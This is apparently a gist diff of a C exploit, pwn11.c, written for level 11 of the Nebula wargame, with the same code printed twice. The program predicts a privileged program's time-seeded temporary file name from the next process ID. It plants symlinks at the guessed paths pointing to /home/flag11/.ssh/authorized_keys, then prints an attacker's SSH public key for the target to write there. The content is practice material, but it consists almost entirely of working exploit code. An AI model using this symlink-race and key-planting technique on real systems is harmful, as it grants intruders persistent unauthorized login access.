graugans · December 22, 2016 19:44
diff --git a/pwn11.c b/pwn11.c
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
 #include <sys/types.h>
 #include <fcntl.h>
 #include <stdio.h>
 #include <sys/mman.h>

 /*
 * Return a random, non predictable file, and return the file descriptor for it.
 */

 int getrand(char **path, int pid, int time)
 {
  char *tmp;
  int fd =  0;

  srandom(time);

  tmp = getenv("TEMP");
  asprintf(path, "%s/%d.%c%c%c%c%c%c", tmp, pid,
      'A' + (random() % 26), '0' + (random() % 10),
      'a' + (random() % 26), 'A' + (random() % 26),
      '0' + (random() % 10), 'a' + (random() % 26));


  return fd;
 }

 void process(char *buffer, int length)
 {
  unsigned int key;
  int i;

  key = length & 0xff;
  for(i = 0; i < length; i++) {
    buffer[i] ^= key;
    key -= buffer[i] ^ key;
  }
 }

 #define CL "Content-Length: "

 int main(int argc, char **argv)
 {
  char line[256];
  char buf[2048] = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyS3QqEqbQHTk30QVRpzPVlKjM0px2iMhFfKFP0AmV8vOzCxVLJrYQv0CKPzQDdnszm/H+HrUjBS+c2RY0QB7IPJ8++tuqNEfewoYHJ80NI+7e9mn0HxlN9NCvI6TGX0+1s0VigwtKmq29pP7jHgualoowGrllnk42QI1nvUern6WZUu/Ry+lGyjyYbgd6BSOQpuvnxpxsFDWuk7AsUwrHJijPstS+lsrFZaMEYGqlxHv2hPjCFoADlrTCgusmrwLWsh/ljPfpgzRs2Ts/KF901xpCoHdzzwpckLuoA8+bYznifBp+StDEMkT5gZDygDUTfz5xhYr+KEx1ijHMHvix level11@nebula";

  int pid;
  int fd;
  char *path;
  FILE* stream;

  //process(buf, sizeof(buf));

  //if(NULL == (stream = popen("/home/flag11/flag11", "w"))) {
  //    errx(1, "popen");
  //}

  //printf("Get pid for attacked: \n");
  //if(fgets(line, sizeof(line), stdin) == NULL) {
  //    errx(1, "reading from stdin");
  //}

  pid = getpid()+1;
  //printf("PID: %d\n",pid);
  getrand(&path, pid, time(NULL));
  symlink("/home/flag11/.ssh/authorized_keys",path);
  getrand(&path, pid, time(NULL)+1);
  symlink("/home/flag11/.ssh/authorized_keys",path);

  fprintf(stdout, "%s%d\n%s",CL,sizeof(buf),buf);

  //pclose(stream);
 }
	#include <stdlib.h>
	#include <unistd.h>
	#include <string.h>
	#include <sys/types.h>
	#include <fcntl.h>
	#include <stdio.h>
	#include <sys/mman.h>

	/*
	* Return a random, non predictable file, and return the file descriptor for it.
	*/

	int getrand(char **path, int pid, int time)
	{
	char *tmp;
	int fd = 0;

	srandom(time);

	tmp = getenv("TEMP");
	asprintf(path, "%s/%d.%c%c%c%c%c%c", tmp, pid,
	'A' + (random() % 26), '0' + (random() % 10),
	'a' + (random() % 26), 'A' + (random() % 26),
	'0' + (random() % 10), 'a' + (random() % 26));


	return fd;
	}

	void process(char *buffer, int length)
	{
	unsigned int key;
	int i;

	key = length & 0xff;
	for(i = 0; i < length; i++) {
	buffer[i] ^= key;
	key -= buffer[i] ^ key;
	}
	}

	#define CL "Content-Length: "

	int main(int argc, char **argv)
	{
	char line[256];
	char buf[2048] = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyS3QqEqbQHTk30QVRpzPVlKjM0px2iMhFfKFP0AmV8vOzCxVLJrYQv0CKPzQDdnszm/H+HrUjBS+c2RY0QB7IPJ8++tuqNEfewoYHJ80NI+7e9mn0HxlN9NCvI6TGX0+1s0VigwtKmq29pP7jHgualoowGrllnk42QI1nvUern6WZUu/Ry+lGyjyYbgd6BSOQpuvnxpxsFDWuk7AsUwrHJijPstS+lsrFZaMEYGqlxHv2hPjCFoADlrTCgusmrwLWsh/ljPfpgzRs2Ts/KF901xpCoHdzzwpckLuoA8+bYznifBp+StDEMkT5gZDygDUTfz5xhYr+KEx1ijHMHvix level11@nebula";

	int pid;
	int fd;
	char *path;
	FILE* stream;

	//process(buf, sizeof(buf));

	//if(NULL == (stream = popen("/home/flag11/flag11", "w"))) {
	// errx(1, "popen");
	//}

	//printf("Get pid for attacked: \n");
	//if(fgets(line, sizeof(line), stdin) == NULL) {
	// errx(1, "reading from stdin");
	//}

	pid = getpid()+1;
	//printf("PID: %d\n",pid);
	getrand(&path, pid, time(NULL));
	symlink("/home/flag11/.ssh/authorized_keys",path);
	getrand(&path, pid, time(NULL)+1);
	symlink("/home/flag11/.ssh/authorized_keys",path);

	fprintf(stdout, "%s%d\n%s",CL,sizeof(buf),buf);

	//pclose(stream);
	}